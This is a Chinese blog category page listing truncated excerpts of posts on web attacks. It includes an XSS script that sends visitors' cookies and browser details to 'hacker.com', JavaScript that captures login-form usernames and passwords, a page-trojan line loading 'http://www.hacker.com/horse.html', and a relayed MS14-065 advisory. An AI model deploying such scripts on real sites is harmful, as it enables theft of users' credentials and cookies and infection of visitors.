![](https://img-blog.csdnimg.cn/20201014180756754.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
社会工程学
文章平均质量分 73
eT48_Sec
这个作者很懒,什么都没留下…
展开
-
XSS信息刺探脚本
重复造轮子,是的,我在学习编程。该 javascript 脚本主要收集客户端用户的 User_Agent、Cookie、Domain、Flash_Version。接收信息的文件由PHP编写,同时增加客户端的IP和访问时间。xss_probe.js/*xss_probeby eT48*/var http_server = "http://www.hacker.c原创 2014-12-27 16:14:34 · 618 阅读 · 0 评论 -
Javascript-截获登录表单的用户名和密码-v1.5
version 1.0 需要代码添加到登陆表单的后面,才可以正常使用。经完善后,可以添加在任何位置,比如 标签里,而不必添加在登录表单的后面。sniffer.js/*author: eT48blog: http://blog.csdn.net/et48_secversion: v1.5*/document.onreadystatechange = function()原创 2014-12-28 21:08:10 · 870 阅读 · 0 评论 -
Javascript-截获登录表单的用户名和密码-v1.0
一段截获登录表单的用户名和密码的Javascript脚本。拿下了网站的数据库却破不了MD5的情况下,可以尝试利用这段脚本截获登录表单的用户名和密码。这段脚本需要调用到DOM,所以应把这段代码插在登录表单之后。sniffer.js/*author: eT48blog: http://blog.csdn.net/et48_secversion: 1.0*/va原创 2014-12-28 18:45:28 · 1102 阅读 · 0 评论 -
初学网页挂马
我觉得网页挂马要考虑两个因素:隐蔽性、成功率。我们只需保证浏览器加载并执行我们构造的特殊网页即可,这样的方法有许多。方法一,我们可以在首页加入以下这行代码。方法二,我们可以在首页加入以下这行代码。horse.js可以这样写:new Image.src="http://www.hacker.com/horse.html";或者d原创 2014-12-27 18:25:33 · 562 阅读 · 0 评论 -
MS14-065 漏洞播报
原文:https://technet.microsoft.com/zh-CN/library/security/ms14-065.aspx当用户使用 Internet Explorer 查看经特殊设计的网页时允许远程执行代码。 成功利用这些漏洞的攻击者可以获得与当前用户相同的用户权限。Windows 7(32 位/64位)Service Pack 1 上的 IE8、原创 2014-12-27 17:40:27 · 657 阅读 · 0 评论